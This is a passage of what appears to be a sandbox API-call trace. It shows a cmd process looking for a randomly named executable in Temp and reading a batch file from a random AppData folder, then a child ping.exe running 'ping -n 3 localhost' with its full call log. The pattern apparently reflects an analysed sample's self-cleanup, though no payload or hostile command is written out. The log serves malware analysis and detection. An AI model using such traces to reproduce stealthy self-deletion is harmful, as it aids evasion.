lpMaximumComponentLength=0x28e0a4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x28e0a8, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x28e0a4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0112.416] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0112.417] _wcsicmp (_String1="F8a3iwA6.exe", _String2=".") returned 56 [0112.417] _wcsicmp (_String1="F8a3iwA6.exe", _String2="..") returned 56 [0112.417] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0xffffffff [0112.417] GetLastError () returned 0x2 [0112.417] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0112.417] _wcsicmp (_String1="F8a3iwA6.exe", _String2=".") returned 56 [0112.417] _wcsicmp (_String1="F8a3iwA6.exe", _String2="..") returned 56 [0112.417] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0xffffffff [0112.417] GetLastError () returned 0x2 [0112.417] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", fInfoLevelId=0x0, lpFindFileData=0x340554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x340554) returned 0xffffffff [0112.417] GetLastError () returned 0x2 [0112.417] _get_osfhandle (_FileHandle=2) returned 0xb [0112.417] GetFileType (hFile=0xb) returned 0x2 [0112.417] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0112.418] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28eaa4 | out: lpMode=0x28eaa4) returned 1 [0112.418] _get_osfhandle (_FileHandle=2) returned 0xb [0112.418] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x28ead8 | out: lpConsoleScreenBufferInfo=0x28ead8) returned 1 [0112.418] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0112.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.418] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.419] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.419] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.419] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.419] SetConsoleInputExeNameW () returned 0x1 [0112.419] GetConsoleOutputCP () returned 0x1b5 [0112.419] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.419] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.419] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f464, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0112.419] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0112.419] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.419] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.420] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f448, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f448*=0x0, lpOverlapped=0x0) returned 1 [0112.420] GetLastError () returned 0x0 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] GetFileType (hFile=0x54) returned 0x1 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.420] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f42c, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f42c*=0x0, lpOverlapped=0x0) returned 1 [0112.420] GetLastError () returned 0x0 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] GetFileType (hFile=0x54) returned 0x1 [0112.420] _get_osfhandle (_FileHandle=3) returned 0x54 [0112.420] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0112.421] longjmp () [0112.421] _tell (_FileHandle=3) returned 145 [0112.421] _close (_FileHandle=3) returned 0 [0112.421] CmdBatNotification () returned 0x0 [0112.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.421] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.421] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.421] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.421] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.421] SetConsoleInputExeNameW () returned 0x1 [0112.421] GetConsoleOutputCP () returned 0x1b5 [0112.421] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.421] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.422] exit (_Code=0) Process: id = "37" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16660" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0xccc" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5595 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5596 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5597 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5598 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 5599 start_va = 0xbf0000 end_va = 0xbf7fff entry_point = 0xbf0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 5600 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5601 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5602 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5603 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 5604 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5609 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5610 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5611 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 5612 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5613 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 5614 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5615 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5616 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5617 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5618 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5619 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5620 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5621 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5622 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5623 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5624 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5625 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5626 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5627 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5628 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5629 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 5630 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5631 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5632 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5633 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5634 start_va = 0x1e0000 end_va = 0x1e2fff entry_point = 0x1e0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 5635 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 5636 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 5637 start_va = 0x330000 end_va = 0x430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 5638 start_va = 0xc00000 end_va = 0x17fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 5639 start_va = 0x440000 end_va = 0x70efff entry_point = 0x440000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5640 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5641 start_va = 0x710000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 5642 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 5643 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 5644 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5645 start_va = 0x710000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 5646 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 5647 start_va = 0x960000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 5648 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5649 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5650 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5651 start_va = 0x770000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 5743 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 5744 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 5879 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 5880 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 59 os_tid = 0xd00 [0109.313] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22ff24 | out: lpSystemTimeAsFileTime=0x22ff24*(dwLowDateTime=0x7f291320, dwHighDateTime=0x1d440a9)) [0109.313] GetCurrentProcessId () returned 0xcfc [0109.313] GetCurrentThreadId () returned 0xd00 [0109.313] GetTickCount () returned 0x26299 [0109.313] QueryPerformanceCounter (in: lpPerformanceCount=0x22ff1c | out: lpPerformanceCount=0x22ff1c*=16610244257) returned 1 [0109.314] GetModuleHandleA (lpModuleName=0x0) returned 0xbf0000 [0109.314] __set_app_type (_Type=0x1) [0109.314] __p__fmode () returned 0x76b331f4 [0109.314] __p__commode () returned 0x76b331fc [0109.314] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbf2ae1) returned 0x0 [0109.314] __getmainargs (in: _Argc=0xbf50d4, _Argv=0xbf50dc, _Env=0xbf50d8, _DoWildCard=0, _StartInfo=0xbf50e8 | out: _Argc=0xbf50d4, _Argv=0xbf50dc, _Env=0xbf50d8) returned 0 [0109.314] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.317] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.317] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xbf5440 | out: lpWSAData=0xbf5440) returned 0 [0109.324] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x22f9b4 | out: phkResult=0x22f9b4*=0x58) returned 0x0 [0109.324] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x22f9a8, lpData=0x22f9b0, lpcbData=0x22f9ac*=0x4 | out: lpType=0x22f9a8*=0x0, lpData=0x22f9b0*=0x0, lpcbData=0x22f9ac*=0x4) returned 0x2 [0109.324] RegCloseKey (hKey=0x58) returned 0x0 [0109.325] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f97c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f9a4 | out: ppResult=0x22f9a4*=0x0) returned 11001 [0109.325] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f97c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f9a4 | out: ppResult=0x22f9a4*=0x946f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x947b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x947e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x93a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0109.507] FreeAddrInfoW (pAddrInfo=0x946f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x947b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x947e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x93a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0109.507] Icmp6CreateFile () returned 0x98b40 [0109.653] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x94830 [0109.653] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x9ebb0 [0109.653] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fea4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0109.653] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x22f9a4, nSize=0x0, Arguments=0x22f9a0 | out: lpBuffer="XH\x09") returned 0x19 [0109.653] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x94858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0109.653] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.653] _write (in: _FileHandle=1, _Buf=0x94858*, _MaxCharCount=0x19 | out: _Buf=0x94858*) returned 25 [0109.653] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.654] LocalFree (hMem=0x94858) returned 0x0 [0109.654] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x22f9a8, nSize=0x0, Arguments=0x22f9a4 | out: lpBuffer="XH\x09") returned 0x18 [0109.654] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x94858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0109.654] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.654] _write (in: _FileHandle=1, _Buf=0x94858*, _MaxCharCount=0x18 | out: _Buf=0x94858*) returned 24 [0109.654] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.654] LocalFree (hMem=0x94858) returned 0x0 [0109.654] SetConsoleCtrlHandler (HandlerRoutine=0xbf17ca, Add=1) returned 1 [0109.654] Icmp6SendEcho2 (in: IcmpHandle=0x98b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22fa20, DestinationAddress=0xbf55e0, RequestData=0x94830, RequestSize=0x20, RequestOptions=0x22f9d0, ReplyBuffer=0x9ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x9ebb0) returned 0x1 [0109.655] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fea4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0109.655] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f9a8, nSize=0x0, Arguments=0x22f9a4 | out: lpBuffer=" Q\x09") returned 0x10 [0109.655] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x95120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0109.655] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.655] _write (in: _FileHandle=1, _Buf=0x95120*, _MaxCharCount=0x10 | out: _Buf=0x95120*) returned 16 [0109.655] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.655] LocalFree (hMem=0x95120) returned 0x0 [0109.655] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer="\x10<\x09") returned 0x9 [0109.655] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x93c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0109.655] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.655] _write (in: _FileHandle=1, _Buf=0x93c10*, _MaxCharCount=0x9 | out: _Buf=0x93c10*) returned 9 [0109.655] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.655] LocalFree (hMem=0x93c10) returned 0x0 [0109.655] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer=" \x8f\x09") returned 0x2 [0109.655] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x98f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0109.655] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.655] _write (in: _FileHandle=1, _Buf=0x98f20*, _MaxCharCount=0x2 | out: _Buf=0x98f20*) returned 2 [0109.656] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.656] LocalFree (hMem=0x98f20) returned 0x0 [0109.656] Sleep (dwMilliseconds=0x3e8) [0110.660] Icmp6SendEcho2 (in: IcmpHandle=0x98b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22fa20, DestinationAddress=0xbf55e0, RequestData=0x94830, RequestSize=0x20, RequestOptions=0x22f9d0, ReplyBuffer=0x9ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x9ebb0) returned 0x1 [0110.661] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fea4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0110.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f9a8, nSize=0x0, Arguments=0x22f9a4 | out: lpBuffer=" Q\x09") returned 0x10 [0110.662] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x95120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0110.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.662] _write (in: _FileHandle=1, _Buf=0x95120*, _MaxCharCount=0x10 | out: _Buf=0x95120*) returned 16 [0110.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.662] LocalFree (hMem=0x95120) returned 0x0 [0110.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer="\x10<\x09") returned 0x9 [0110.662] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x93c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0110.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.662] _write (in: _FileHandle=1, _Buf=0x93c10*, _MaxCharCount=0x9 | out: _Buf=0x93c10*) returned 9 [0110.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.662] LocalFree (hMem=0x93c10) returned 0x0 [0110.662] 